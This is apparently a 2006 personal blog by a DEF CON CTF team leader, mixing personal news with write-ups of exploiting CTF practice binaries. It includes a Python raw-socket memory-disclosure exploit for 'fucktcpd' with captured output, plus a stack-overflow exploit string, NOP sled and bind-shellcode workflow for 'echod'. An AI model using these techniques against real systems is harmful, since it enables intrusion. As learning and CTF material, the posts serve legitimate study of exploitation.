CNet's picture of 1@stplace
Who are we?
Two of the team recognized by the local newspaper


I also received a great deal of positive feedback to my defcon talk, The Making of atlas. Thank you! Your feedback is very much appreciated. Things like "Here the clock is striking 0430 and I maintain a feeling of exuberant success.... In this week I've drilled through material that I used to shy away from and I'm sure hearing your talk had something to do with it." and "For the last four years I have yet to meet someone that could inspired as you were a inspiration for me at the end of your speech."

Wow. My humblest thanks. I have likely received much *more* attention for leading the winning CTF team... but these choice morsels of appreciation are the quality which cannot be compared. You, my friends, have understood the talk. It wasn't so much about in-depth teaching... but hoping to encourage others to take the chance and enjoy the process of growing beyond your perceived potential. Thank you. A thousand times, thank you.

On a separate note, I have a friend who is searching for something he will not let himself find... purpose. In his latest lament, he mentioned other people doing GREAT things and worrying that soon it will be too late to start and become great. First off, Mr. Friend, vocational greatness compares little with true greatness. I've known "common" janitors, construction and factory workers who are great.... and celebrities who were not. Look at Hollywood and you'll see a great number of celebrities who are not great. I'm reminded of a song by Barlow Girl. "I wanna be a star, but is that all I'm really here for? And if I'm not a star will it be ok? will I still be someone?" Hang in there. Life has many purposes.
The true impact of a life is not measured by the far away spectators, but by the people you touch. You've chosen not to have kids until this point. Not that they immediately "fulfill your life cravings" but they do give many opportunities to be great... or fail.
There is one great investment left in the world. Many will tell you it is real estate... but it is in other people. Caring for other people. You would bluntly label it "altruism". I would call it loving your "neighbor" as yourself. These are different. The former does not include the "love yourself" thing.
It's a long road, with many subtlties along the way. It is often your life and the way you live it which create value you will not immediately see. Surround yourself with a few good, kind, respectable friends of character. Let their company cheer you and their advice take hold. I believe this world was created primarily for our enjoyment and tending. Do some of both.

Your friend,
@

[] permanent link / /

defcon slides


Thanks to psifertex (of 1@stplace fame) for hosting the slides from my defcon talk. The main r4780y site doesn't have as much bandwidth so they'll be hosted Here
He's also kindly hosting the @UtilityBelt and the Possibly Braindead Tips to Deadlisting


Muchas gracias, psifertex!
@

[] permanent link / /

And the 1@st shall be first....


Yes, my friends, we've done it. The world is now officially upside down. 1@stplace took First place at the recent Defcon Capture the Flag!
Wow. Too much to deal with right now... and I haven't slept since then (back to work already)...

Major choops go out to my team.
drb for his automagic, quick sploit writing, and helping me keep the balls in the air
wrffr for his binary leetness and c64 multidimensional mindwarping sploit
apu for his flexibility (and McD's!), working both defense as well as bringing his understanding of exploits to the sniffer when it went active
psifertex for his defense-fu... and how he was able to play offense too
plato for scavenging keys like a madman, and even manually piecing keys together for one sploit

unfortunately, shiruken was unable to join us, and we felt the lacking. We did temporarily conscript two guys who deserve honorable mention:
john, who not only helped with defense, but really livened up the party
brian, who helped out on defense when psifertex had to leave early (and brought me coffee!)

beyond these great things, these folks all shared in several key traits which made a serious impact on the game, as well as the outcome.
They were indeed a team. The people which embody the huge intelligence are choice people. They were all patient, eager, and ready for each task. They were all self-starting and driven. They worked well "with little supervision" and were simply a pleasure as teammates.

Many choops to them.

Thanks go out to the many folks who gave us support. Your words (and beer!) did not go unremembered. Thank you.

Greetz to the fellow teams, each of which hold my respect. I particularly want to mention Skewlmaster, Giovanni, fednaught, the blueballs team...er.. "Our wives are pissed", the ad hoc team (who came to the con not expecting to do ctf!)
MAJOR CHOOPS to the Far East team, who came all the way from South Korea! Very glad they could come!

wow. What a weekend. It was also great to see good old friends and make some interesting new ones!

atlas

ps. Solaris is a pita.

[] permanent link / /

Late Tonight Better Than Tomorrow

Well, I said that it would be released "tonight" and though technically it's "tomorrow" I haven't slept so it still counts
CTF seems to be going fairly well for our team so far. Unfortunately, tomorrow will change the landscape in a *huge*
way. We are up against some of the best hackers in the free world, including those from the Navy, UC, and even Korea!

Here is the @Utility Belt. Hopefully it will help you
as it has me. Hopefully it will inspire you to build your own toolkit as your skillz grow. Feel free to use as much
of mine as you like.

My most recent addition is quite exciting for me, it's nc.py (yes, that's NetCat in Python).
It brings to Unix the ability to "Listen Harder" (previously only a Windows feature), and adds RAW socket support!
It's not completely a rewrite of netcat, as there are a few finer details not implemented yet...
It's is not completely tested, and the error messages are the plain jane Python messages.
BUT, I was able to use it today during ctf because the Solaris boxes we're defending don't have nc installed... and
binary installation was proving difficult at the time. So I copied it up there and only had to change the location
of the python binary. Excellent. I wired up a nc.py forwarder to bounce through our server to access something else.
It made my day that much better!

en/un64 as well as the other converters are just plain helpful when you need to convert hex/base64/binary to and from ascii

disass has probably had the most devoted work to it... and it is the most helpful to me at this time.

All this is released under GPL2.0. I simply ask that you let your curiosity and determination wonder and conquer...
and that you tell me about it :)

Also, find the "Atlas' Possibly Braindead Tips to Deadlisting" here. These are some of the more interesting tidbits to chew on.

Have fun and hack safe! (and thank you to Skodo who did end up visiting me during the ctf. It was enjoyable to catch up!)

@

[] permanent link / /

Where the Code Has No Name

(To the tune of "Where the Streets Have No Name" by U2)

You might want to run, You might want to hide
I'm gonna tear down the walls that hold me inside.
I'm gonna reach out, and land a NOP sled where the code has no name.

I'm gonna point EIP anyplace.
I've seen the dust cloud disappear and seen your disgrace
There ain't no shelter from the poison rain where the code has no name.

Where the code has no name. Where the code has no name. I been building a code library
And when I take over, I'll pwn all of you... All I can do.

Buffers o'erflow and our love turns to rust.
Your reputation is dead and trampled in dust
I'll laugh in your face, flyin' high in cyberspace
Where the code has no name

Where the code has no name. Where the code has no name. I been building a code library
And when I take over, I'll pwn all of you... All I can do.

[] permanent link / /

Security Advisory: fucktcpd information disclosure vulnerability

Advisory: 2006-atlas-001
Affected Software: fucktcpd
Affected Versions: all
Main Developer: invisigoth
Risk Rating: Moderate
Remotely Exploitable: Yes
Locally Exploitable: Yes
Release Date: 2006-07-06

Description:
------------
fucktcpd is a not quite popular checksumming form of echo. The key feature of fucktcpd is that it does not use TCP or UDP, but rather the CHAOS/IP protocol.

Vulnerability:
--------------
fucktcpd uses a simple protocol. It expects a string of data using protocol 16 (CHAOS). The third byte of the packet payload indicates the size of the data being handed in. Because the buffer used is 0x1000 in size, and a single-byte size variable can only indicate up to 256 bytes, no buffer is overflowed. The resulting heap allocation and memory copying adhere to acceptable bounds checking, at least with regard to buffer overflows.

However, the size bytes is not correctly validated against true input size, resulting in possible information disclosure.
For example, handing in a string of data which contains only the first three bytes of payload, but providing a size-byte of 0xff (255), arbitrary memory is accessed, copied, checksummed, and sent back to the attacker. If sensitive data was previously sent to the fucktcpd service, this information may be sent to an attacker

Example:
--------
#!/usr/bin/python

from socket import *
import sys



sock = socket(AF_INET, SOCK_RAW, getprotobyname("chaos"))

def send(host, data):
  sock.sendto(data, (host,0))

def recv():
  data,sender = sock.recvfrom(2000)
  print "got %d bytes from %s" % (len(data), repr(sender))
  print "DATA: %s" % (repr(data))

exploit = "\x00\x00\xff"
send(sys.argv[1], exploit)
recv()



$ sudo ./fyou-fucktcpd.py 192.168.255.128
Password:
got 278 bytes from ('192.168.255.128', 32756)
DATA: 'E\x00\x01\x16\x00v\x00\x00@\x10\xf9\x8e\xc0\xa8\xff\x80\xc0\xa8\xff\x01\x01\xe2\xffaA0aA1aA2aA3aA4aA5aA6aA7aA8aA9aB0aB1aB2aB3
aB4aB5aB6aB7aB8aB9aC0aC1aC2aC3aC4aC5aC6aC7aC8aC9aD0aD1aD2aD3aD4aD5aD6aD7aD8aD9aE0aE1aE2aE3aE4aE5aE6aE7aE8aE9aF0aF1aF2aF3aF4aF5aF6aF7
aF8aF9aG0aG1aG2aG3aG4aG5aG6aG7aG8aG9aH0aH1aH2aH3aH4aH5aH6aH7aH8aH9aI0aI1aI2aI3aI4'


Credits:
--------
atlas for his bull-headed stupidity
invisigoth for the enjoyable exercize
1@stPlace for putting up with atlas' continual rantings and detailed walkthrough of fucktcpd

http://atlas.r4780y.com/

[] permanent link / /

Correction!

We have been talking with Sk3wlMaster from the Sk3wl0fR00t, who we deeply respect, and are fortunate enough to be on good terms with, and it seems my comparison of Pwnage500 times is a bit skewed. It appeared to take Sk3wl about 20 hours but in reality it took Sk3wlMaster about 8 hours. I mentioned that it took us 4 hours, but given a relocation lag (and food), it would have appeared to take us 6 hours. Still, drb and wrffr compared to Sk3wlMaster at those times is *really* impressive! Sk3wlMaster is one of the greatest bughunters I know.

My apologies to them for the misrepresentation. For those of you who think this may be minor, please consider the amount of respect required for these guys... and you'll figure out why I made this announcement, rather than simply fixing the numbers.

@

[] permanent link / /

Month of Madness

Wow! Talk about a crazy month!
A little over a month ago, I had to put the network appliance upgrade on hold. I made it to release candidate 0. Not a bad worth of work.
However, about a month ago I started heavily preparing to teach a class for SANS. Which one? Of course, Ed Skoudis' famous SANS 504: Hacker Techniques, Exploits, and Incident Handling. So, on June 5th I was on. The most difficult, most gruelling 6 days of back-to-back teaching I've ever done. Day one covers the foundations of handling security incidents. While probably the least sexy, one of the most valuable since very few are skilled at the art of incident handling. The next four days are spent detailing the cyberattack process, with popular examples at each step. We cover everything from Googlehacking to Rootkits, and of course three of my favorite toyz: Nmap, Netcat, and Metasploit Framework. Choops go out to Fyodor, Hobbit and the msf team for their contributions to my entertainment/addictions. On the sixth day the students are put through their paces in a capture-the-flag style hacker challenge. No, we don't make them write their own sploitz :) but they are forced to determine weak points, exploit them and think about how to leverage each completed goal to attain the next. It's very kewl.
It was thrilling and enjoyable to see my students catch on and get clued in on the battlefield that is cyber-attacks. The threats live on all sides, and they got that. When I explained BOF's I was surpised to see very few heads explode! Actually, most of them had a look of concern and understanding... w00t!
One of the most interesting things about the class was the involvement of law enforcement. I'm faced all the time with rumors and humor about how ill-equipt law-enforcement is at dealing with cybercrime. While I'm still of that opinion based on limited resources, etc... I now have hope that the ones who get it, get it. I got to hang out with some of (probably all) the top minds in Michigan's cyber-cops. Most of them did a lot of forensics (whey cool) and they all had a good head on their shoulders... although I'm freightened about how they "obtain" new hardware for the department. :) Makes me not want to get arrested!

While the class was a success and definitely a high....

atlas proves his doof again...

[] permanent link / /

CTF registration

You have been registered for this year's qualifications.
You will receive a follow-up e-mail with a URL, username and password to use during the quals.
Qualifications will take begin on Friday, June 9th 10pm EST, and will end at 23:59:59 Sunday, June 11th.


Crap. That means I'll be teaching during half of Saturday... luckily I have an amazing team who will be able to deal without me. They'll probably have the thing done by the time I'm done teaching... :)

I'm honored to be leading a team with an immense amount of talent, to which I bring comparatively little. Watch for 1@stPlace during Quals that weekend, and at ctf the first week of August in Vegas. Def Con 14 is at the Riviera this year.
Check us there.

@

1@stPlace consists of, in no particular order:

• myself (atlas)
  
• plato
  
• shiruken
  
• psifertex
  
• apu
  
• wrffr
  
• drb
  

[] permanent link / /

fucktcpd is kicking my 455
The venue:
MorningStar76 "coffeehouse and den of sin", the same place that put the jitter into the jitterblog.
Sitting, watching the many varied personas walking around, sitting, playing cards, chess, livejournalling, or just looking at me funny.
Smoke filling my lungs so much I wish I smoked. Certainly will be showering before hitting the sheets this eve... nothing new there. A curly-red-haired boy (yes, you read that right) "flitting" around... everyone being some version of more or less themselves... or the facet they put on when out with friends. Interesting to watch what people make of themselves when in various environments. I enjoy people-watching.

But that's really just me shirking the job at hand. Taking a break from having my butt royally kicked by fucktcpd. I'm trying desperately to break fucktcpd by simple deadlisting... and I'm just not there yet. As you can tell, I've picked it back up... and oh. what a pleasant reunion, feeling it's entrails trickle down my spine as my brain fully bytes into the juicy code. The feeling of being naughty comes back in a welcome sense of alternate reality. One where bits really make a difference... one where appearances do not... one where politics are nowhere to be seen... and communication with the outside world requires translation. Ahhhh, sweet l'amour.

I'm sitting, looking at the deadlisting, attempting to ignore the distractions of people walking by, some more respectably clad than others. One mom wears an outfit with "Juicy" across her behind as she accompanies her 13-year-old daughter to a cup-o-joe.
It's really a small snippet of code? I've split out functions, split off the calls to outside libs, split off the glib startup and destructor code, and I'm left with "drop_privs", "checksum", and "server_loop"... symbols have been stripped so that's just my name for them.

As Evanescence and Blue Man Group set the mood of driving angst, I lament the missing vulnerability... Still, continuing onward and downward. Sure the end result will be my continued education, I bid you adieu as I get back to work.

@

[] permanent link / /

Jitterblogging


I know it sounds like a B-52's song title, but it's what I'm doing right now. Essentially, it is too little sleep to stay awake, and too much caffeine to stay still... throw that together with a healthy dose of too much to do and no time to blog, and you have jitterblogging. Perhaps these french-fries will help my hands stop shaking.

A few days ago I took my wife to see Phantom of the Opera in the theatre. Awesome stuff. Talk about your social engineering! Everybody fears this guy, he gets an outrageous salary, gets to sing with a beautiful babe, and play nifty tricks, not to mention controlling everything! But alas, like all social engineers, one wrong move can cause the whole thing to come tumbling down... I forgot how much I love the theatre. I dropped nearly $140 for our tickets and it was worth every penny. I've always dreamed of playing the Phantom (yes, atlas can sing!)... but enough about that. If I had been more mature in college, perhaps I would have stuck with the vocal performance degree I started... but I probably wouldn't be where I'm at today...

I've been going crazy at work and at work. Dayjob has been dragging me in 8 different directions. Today it was pitting me against some oddo issues with incompatible PEAP/802.1X wireless devices, and I'm having to laboriously deal with very nice technicians who can't suggest anything I hadn't tried before contacting them. That, on top of some recommendation reports for various aspects of security... Worst part is that I'm having to code some VB.NET for a customer for some crypto stuff... Oh, if only they approved of Python or Perl.

Night job (my company) has me too busy even to hack. Yes, I know, all three of you are waiting with baited breath for my next installment of fucktcpd, but it will have to wait. I have a product which is nearing completion, and am trying to focus on it so I can better enjoy hacking again without the guilt. It's almost to the pilot phase. Then comes the migration tools (from v1.x)... and then Documentation. Ewww yuck.

To make the month even better, my mother-in-law had surgery today, to fuse three vertibra in her neck. For a normal person, this is awful. To a person whose "one thing" is horses, this is devastating. It's difficult to even think about it. Today I also found out that my friend's little brother died 3/1/06. My prayers and heart go out to her and her family. Wes was a good kid. It's hard to imagine losing a brother, or a child. I wish there were more to express what I'm feeling, but nothing comes out. Lack of content here does not indicate lack of impact.

I watched a truly horrid movie last night with my wife. We both wished we could have the two hours back after watching Bee Season. Imagine, one of the few movies Richard Gere doesn't play a total sleezebag and it's a worthless film. I guess it just goes to show that he has to play sleezoids. Either that or the screenwrite needs to be taught a bit about plot. The only thing I took away from that film was that they were all totally horked individuals... that's it. I did enjoy watching Aeon Flux a day or so before that however. What? I spend too much time watching movies and not enough hacking? I can see that point. Movies, TV, and reading are a few things I do with my family. Let me set the record straight: My family comes first. Yes, even before hacking. :) I also spend time cooking, playing soccer with my daughters, and riding horses/motorcycles. Ok, so the last part isn't family time, but hey! I'm jitterblogging. I don't need to be cohesive. Go read CTF prequals are looming I can't get a word from Kenshoto on when they'll be (gee, so maybe I won't plan company to visit for that weekend, or adopting a newborn, like last year) but it's coming. One of my opponents form last year (plato, the runner-up individual) asked me to lead a team this year so he could be on it. Along with Plato, I've been able to scrape up a really promising team. There's a lot of talent and brainpower in the group. Hopefully we can become a team. A couple years ago, the Detroit Redwings were a perfect example of huge talent but team-challenges. They actually did a pretty good job of making it work. Hopefully we can do the same. More on the outstanding bunch of guys later. One thing I'm wondering is how the individual game will be played this year, (if at all; it caused a bit of ruckus last year) and how to capitalize on the wildcard factor. We shall see...

I did submit a talk to the defcon "call for papers" this year entitled "the making of atlas: kiddie to hacker in 5 sleepless nights". Before you go thinking it's a self-glorifying talk, it's not. Several people have seemed interested in this guy who taught himself how to hack from reading... so I'm hoping that gets the foot in the door. The talk is kind of a recount of prequals, specifically stage3, my first ever binary exploit and how I got there. It is a bit of an intro to hacking for the common techie, and is anything but self-glorifying. If anything, it's more of a "you could have done it just as easily" talk. The only thing I can claim credit for is overcoming my self-doubt and committing to it. Anyway, I have been working on my toolset (like converting it to Python and prettifying it) and plan to release it to the public at dc14 during my talk. It's not spectacular, but I've found the tools quite handy. Highlights include a format string exception generator and a disassembly tool (making calls to objdump and labeling, processing etc...)

And that, my friends, is the end of this jitterblog. I hope you've enjoyed it. Time for bed.

[] permanent link / /

longtime no post
Yes, thank you for noticing, I've not posted in a while. And with good reason. I'm afraid I still have not had the time to post more about fucktcpd, so if that's what you're looking for, don't bother reading the rest of this post.


I recently did 4 interviews with a large security company only to be turned down. They had four positions and apparently I wasn't in the top four. The friend who got me to interview tells me I was close, but he's a friend, what's he gonna say? There are potentially other jobs I could do there, even perhaps better matching my "break things" direction... we'll see. They seem too busy to talk to me, which I can understand. They're starting a brand new department.
Bottom line is I'm content in my current job and that may be why I didn't make the top four... :(

Meanwhile, back at the ranch, we've had kids sick and me sick within the last few weeks. We're all doing much better though. And the family is great. I'm very thankful. I wish I could say I made it out without an inappropriate encounter with the toilet, however :/

My consulting/network appliance business has kept me busy. I've much to learn about the low-price appliance market, and I've already learned so much. The appliance cost and maintenance costs must cover the amount of work it generates or you end up doing a lot of stuff for free! :\ My wife kept me from mass marketting the thing a couple years ago. I'm kinda glad she did, given some of these lessons I'm having to learn. We are waiting until such a time as it makes sense (time-wise)... if that ever happens.

Meanwhile, I've been working to get the v2.0 of the product ready. It's a shift from one major distro to another completely different distro of Linux for its base. That is proving interesting. I am glad I'm doing the shift now rather than later. The switch is getting it off an RPM-based distro onto a DEB-based Ubuntu platform. This gives me a better update mechanism. That's always been a problem. If I wanted to make my own updates it was always having to hack into SuSE's online update mechanism which is proprietary. Debian distros are all using APT, which is just as easy to package for and much easier to maintain a software repository.

Anyway, I'm probably 3/4 way through the major refresh of the build package, which handles all the building/configuring events. I have some holes to fill in for the Modem and DSL connectivity pieces, and a few other areas to be completed. Then I move into the "spot-check" phase, where I test every major subsystem to see what doesn't work right. The todo list then serves as the countdown to pilot (which is where I convert my own systems one-by-one). Somewhere before then I have to work out the inplace upgrade process, where all the hard drive locations get moved into the new locations (as the Ubuntu packages often place things in different locations than SuSE).

Meanwhile, I'm reading "Reversing: Secrets of Reverse Engineering". Seems pretty good so far. I'm only into the second chapter, but it promises to be very good. I'm also reading The Shellcoder's Handbook, and Hacker's Disassembly Uncovered is next on the list.

Meanwhile, I have a singing gig in a few weeks..... A friend of mine and I are doing a duet "Never Alone" by Barlow Girl (yes, we're male-ifying a girl song)

Meanwhile, I've been working to come up to speed on PyElf, and contribute a little bit. It tears apart an ELF binary and should allow you to modify it and put it back together when we're done. This is a project lead by Visigoth and Metr0 from Kenshoto.

Meanwhile, I've put together a proposal for a DefCon 14 presentation and tool release. So I've been updating my hack-assistance tools and am going to package them and release them at dc14 if I get selected.

Meanwhile, I've taught myself Python which is an awesome language. My day-job is getting me to learn C# and VB.NET. And a part of me would like to learn Ruby someday. Perhaps I should do it, since I clearly don't have enough going on. :)

Meanwhile, I'm going to be teaching SANS 504: Hacker Techniques, Exploits, and Incident Handling soon. This was how I got my start into this world. I'm *really* geeked! I just finished mentoring this same course, which of course was 12 weeks long (normally 10 weeks). I've been wanting to teach this class since I took it with Ed Skoudis. I'm no Ed... but I guess neither was Ed when he started ;)

Meanwhile, the day job has got me doing a wide array of things, some still relatively new to me, some old hat. From configuring Wireless bridges to firewall design and maintenance, to application security assessments, etc... they keep me busy. We are doing a good deal of systems design and replacement of legacy core systems. And they have me involved during various phases to ensure security is designed in. They've also got me doing security audits on existing systems, and code audits will be the next step (which of course is the direction I'm enjoying). That's why I'm learning C# and VB.NET, so we can not only point out issues, but come to the table literally speaking the developers' language. Granted, I'm learning it a bit differently than they are ;) But you can't expect every Windows developer to learn on both Visual Studio *and* Mono, nor to spend the time disassembling the IL. ;)

Well, time to head. I wanted to let both of my readers know why they haven't seen any new posts in a while. The job-interviewing and stuff really took it out of me. I picked back up the deadlisting of fucktcpd, though. We share overcome. It's enjoyable ;)

[] permanent link / /

Stack Rebuilding

Well, as for the "next target", I've selected visigoth's "fucktcpd". But that's another post. Right now I wanted to share a little about rebuilding echod's stack so it returned properly.

*) Start with the basics (I know nothing about this, so I'm feeling my way): Returning in the program
A quick backtrace from the "reverse_echo_cmd" sub (using the debugger gdb) shows that returning correctly should send the instruction pointer to 0x804916a.
Hmmmmm, I know that at the beginning of each sub is a

push %ebp
mov %esp,%ebp

and checking the contents of the stack show the address at %ebp+4, aka 0x4(%ebp):

13: x/32xw $ebp - 92
0xbfaedeec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedefc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf2c: 0x00000000 0xbfaedf50 0x0804c6bb 0x0804c6bc
0xbfaedf3c: 0x00000000 0xbfaedfec 0x08054700 0xbfaedfb8
0xbfaedf4c: 0x0804916a 0x00000004 0x00000002 0xbfaedf70
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
(%ebp is in bold and 0x4(%ebp) is shown in italics)
We already knew this since that's the address we had to overwrite. We'll refer to this snippit later on as we clean up the stack.

So I set a breakpoint at the "leave" instruction for this sub. Then, allow the instruction to execute using "si".
I'm next left with the stack looking like this:

14: x/32xw $esp
0xbfaedf4c: 0x0804916a 0x00000004 0x00000002 0xbfaedf70
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
0xbfaedf6c: 0x00000002 0x0804a900 0x0804a904 0x00000000
0xbfaedf7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf9c: 0x00000000 0x00000000 0xbfaedf70 0x0000007d
0xbfaedfac: 0x00000004 0x00000000 0x00000000 0xbfaedfd8
0xbfaedfbc: 0x2807faf1 0xbfbfecc4 0x00000000 0x00000000
13: x/32xw $ebp - 92
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
0xbfaedf6c: 0x00000002 0x0804a900 0x0804a904 0x00000000
0xbfaedf7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf9c: 0x00000000 0x00000000 0xbfaedf70 0x0000007d
0xbfaedfac: 0x00000004 0x00000000 0x00000000 0xbfaedfd8
0xbfaedfbc: 0x2807faf1 0xbfbfecc4 0x00000000 0x00000000
0xbfaedfcc: 0x00000000 0x00000000 0x280964bc 0x00000000
(the top part shows the stack starting with %esp. the bottom views the stack so that %ebp is on the right side of the sixth row, or the third from the bottom. in case you can't tell, these are two of my favorite "display" settings in gdb)

Key point: See our favorite address at the very top of the stack. After poking around, the "leave" function reverses the beginning of the sub:

mov %ebp, %esp
pop %ebp


All that's left to do after that is to return to the calling function...
So, when we're done with the shellcode (I broke the execve() call to tinker), we'll simply push 0x804916a and then ret... Let's try it:

push $0x804916a
ret


This did indeed return me into handle_client where we left off, but I get a segfault soon thereafter.
hmmm... it appears we have thrashed the stack, and must so some rebuilding.

Comparing at the start of the NOP sled to post-shellcode (sorry, no screenshots for this one), it seems the shellcode used leaves 0x58 bytes on the stack.  Well, they can't be blamed for not expecting us to return here.  Let's try readjusting %esp like so:
add    $0x58,%esp            ---------------------   clean up stack (messy, messy shellcodeses!)

Comparing again, %esp is where it should be.  %ebp, however, is *completely* smashed.  Remember, the "leave" command did the "pop %ebp"?  Well, my initial sploit overwrote everything up to the return address with "A", so of course, %ebp looks like "0x41414141".  So, I make the change in my sploit to overwrite this space with the correct value of %ebp afterward (which we'll find is a problem later), and a couple other fixes:
$string = "REV \x05\xbf\xae\xdb\x50\xbf\xae\xdf\xb8\x08\x04\xad\x04\xbf\xae\xdf\xec\xbf\xae\xdf\x3d" . "A"x94 . reverse($shellcode) . $NOP;
    (you may wonder about the initial \x05.  The string ends in 0x00, and this byte overwrites the significant part of the next value on the stack: 0x00000005.  By prepending the \x05, we overwrite the *next* byte with the 0x00, which happens to already equal that )

This worked!  However, in the process of figuring this out, I ran across another nifty fact about Multithreadded apps which I'll get into in a few minutes.

So, we have returned into the calling sub, reset %esp to it's appropriate place, and %ebp now returns to its appointed position.  That should be good, right?  wrong.  Don't get me wrong, this was quite an accomplishment, but I'm not quite there yet.  We are returning into handle_client fine, and disconnecting the connection does allow handle_client to exit, and the thread looks like it's about to be recycled... then it SegFaults.  

What?  Hmmmm....  So what are we missing?  Well, apparently the thread destructor does a jmp %ebx or somesuch.... and of course, %ebx is used in the shellcode.  DOH!  So, ok, I'll push %ebx at the beginning of the shellcode, then pop it off later.  That seems to work, at least as far as I have pursued it so far...  More on that later (perhaps in another post).  

The problem that keeps nagging me at this point is as follows:  I'm discovering that this sucker assigns a chunk of stack space for each thread.  So the first thread might be at 0xbfaeXXXX, the second thread is then at 0xbfadXXXX, and the next thread at 0xbfacXXXX and so on.  I can predict where *within that space* the data is going to reside, however, I can't predict what thread I'll get...  And worse yet, this puppy doesn't just affect returning gracefully, this affects exploit execution altogether.  I'm returning into the stack, so that stack has to be the same, or my sploit has to magically change on-the-fly prior to any sploit-execution...  Not very possibly in *this* universe.  I had been experiencing odd inconsistencies on occasion, and it looks like this is the culprit.  
The solution, however, was quite nice.  Ok, so the stack space is dynamic and a change of threads can totally screw up the exploit.  There happens to be a place in memory this data gets copied to for every thread: 0x804a904  
This is shared memory, so it's still possible to run into issues if other threads write to it before we can execute the shellcode, but it's the best things I can find.  One key point: This data is *PRE-REVERSING* so the shellcode has to go back to straight-forward.

So the sploit code starts to look like this:

 $string = "REV \x05\x08\x04\xa9\x50\xbf\xae\xdf\xb8\x08\x04\xad\x04\xbf\xae\xdf\xec\xbf\xae\xdf\x3d" . "A"x93 . $shellcode . $NOP;

We dropped the return pointer a little after the start of the memory buffer so as not to try to execute the "stack repairing" data as code.

Ok, so we can execute code regardless of thread... but now we have the whole return gracefully thing.  If we hard-code the %ebp replacement (as we currently are) we could really cause nasties, as the %ebp for thread 2 would then point to the stack for thread 1!  Not good.   Solution?  

My choice was to compare %ebp to %esp.  Luckily the relationship appears static at this point in the code.  %ebp is consistently 0x68 bytes greater than %esp.  So we just add 0x68 to %esp and we get %ebp, right?  Well, sorta.  There are two tricks to it:

1. We have to make %ebp = %esp, then do the addition to %ebp.
2. We can't simply add 0x68, since that compiles to \x81\xc5\x68\x00\x00\x00 and that is not String-friendly  (ie.  The string ends at the first \x00, boys)
3. We're not only interested in %ebp's location, but also interested in the content there.  This determines the *next* part of the stack trace, apparently 0x20 bytes north of here.

[] permanent link / /

New Location, same zany wacky wierdo!

Well, you made it here. That's the first hurdle!
Many thanks to Kurios for the use of his blog-space over at blogspot. He should be moving over this way soon too...

New feature: RSS Feeds!
So you don't like checking back all the time!? Well, feed the link at the left side here into your favorite RSS reader and you'll see the latest headlines. That's something Blogspot doesn't seem to offer.

Nothing new to report. Family responsibilities, getting ready for vacation, holidays, and on-call at work have made this a very interesting month, to say nothing of the GoogleHacking course I taught tonight (yes, the night of my first day of vacation... not likely the wife's going to forgive that one any time soon).

The class went pretty well, although there were a couple guys unhappy with the content. I'm going to see if I can't make it worth their while and do some more stuff behind the scenes. I started a mailing list for the class. Kinda silly since it was a one-nighter, but it introduces some interesting possibilities. We'll see how that goes.
They want to know when I can do more, but all that work for a very small amount of money... not sure. Great fun, though. I do love teaching. But all the prep work involved makes it pay less than my day job. Maybe I can improve on that next course. We'll see.

I haven't decided my next target for hacking yet. I'll have to decide that when I get back from vacation.

Ciao,
@

[] permanent link / /

Stick a fork in echod

echod is now on life support only. Officially dead, I now wish to clean up my sploit to have it continue execution. We'll have to see about that one. :\ Can't say I've ever written a sploit to return, but this seems like a great time to start.

It's actually been a week since I've been able to touch it, so I'm not feeling quite as lame as I was last week. Work has extended into the evenings and then there was the wedding I had to liven up :) (kudos to Ryan and Rachel!)

This round in my fight with echod was much less confounding. I had already structured the exploit code so I could tinker with the header (as the term suggests, I'm speaking of the initial set of bytes which hold the address to overwrite the return pointer and some other goodies used to reconstruct the stack... remember that everything is reversed). The string dynamically generates NOPs to correct the buffer size from any changes.

Since that was already in place, I simply pumped some net-bind shellcode through "reverse()" and appended the resulting string to the sploit header (thanks again, Metasploit!). This broke stuff at first. It seems some of the memory the shellcode was occupying gets altered before execution. Solution? Add some NOPs after the header, before the shellcode, and check again. I ended up using 96 (nice round number) NOPs for this as 32 and 56 were not enough. Surprisingly, that provided a stable/consistent exploit.

As an exercize, I then wrote three while loops:

*) one to check the service and restart it if dead

*) one to run the exploit, connect using netcat, read, then overwrite a simulated "key" file, like in the CTF

*) one to check the "key" file and overwrite it with the correct value if overwritten

These have been going now for some time and working quite nicely. Now, I just need to turn my attention to returning gracefully. I believe the appropriate course of action is to "mov 0x<someaddress> 0x4(%ebp)" and then call "ret" instead of calling "exit()". We'll see how that works out.

I'll let you know. I feel awful right now and am driving home from Skelletones, so coding has stopped. Between the fog and deer-hazards, blogging is all I can manage! Perhaps if I felt better ;)

@

[] permanent link / /

echod bleeds...

Program received signal SIGSEGV, Segmentation fault.
0xbfaedf4d in ?? ()


Finally, after weeks of teeth-gnashing I have been able to get echod to consistently bleed, yet some of the blood is my own.
(for those you not fortunate enough to understand it, this indicates that I have changed the instruction pointer to someplace in the stack where it doesn't belong... one or two steps from shell-access)

It's bleeding, not dead yet. I have to inject shellcode (in reverse for this vuln) before I can stick a fork in this baby.
I wish I could say "I finally got around to looking at it..." but I've been working on it ever since Def Con (many times only 1/2 hour at a time, which is awful). I have learned quite a bit, however, and have been intentionally taking my time, capitalizing on the opportunity to improve my skills (I've played and explored a bit. Big fun the "pay-for" guys might not get to enjoy as much). Still, I gotta get faster, even with the tough ones.

echod presents challenges, although much of my pain was self-inflicted. echod is multi-threaded, presenting oddities with both debugging and fuzzing. gdb would be piping along and suddenly it would inform me that it just thread-hopped and I was starting from a different location, working different logic. It became particularly difficult because I had my pseudo-fuzzer (it doesn't deserve to be called a real one) set in a loop most of the time... which I think somehow caused several threads to be pumping information into the binary, while I'm also attempting to debug and make sense out of the assembly. argggh! Aside from turning "0x0a" to "0x00" and splitting stings on "0x20", the string was pretty much straightforward, although the "reversing" functionality employed some logic I couldn't quite follow without stepping through it (and even then, it's up in the air).

That isn't to say that I didn't learn a great deal along the way.. You could say that I learned many things about reverse engineering, particularly threaded apps. Here are a few:

• Printing the dis/assembly is invaluable!


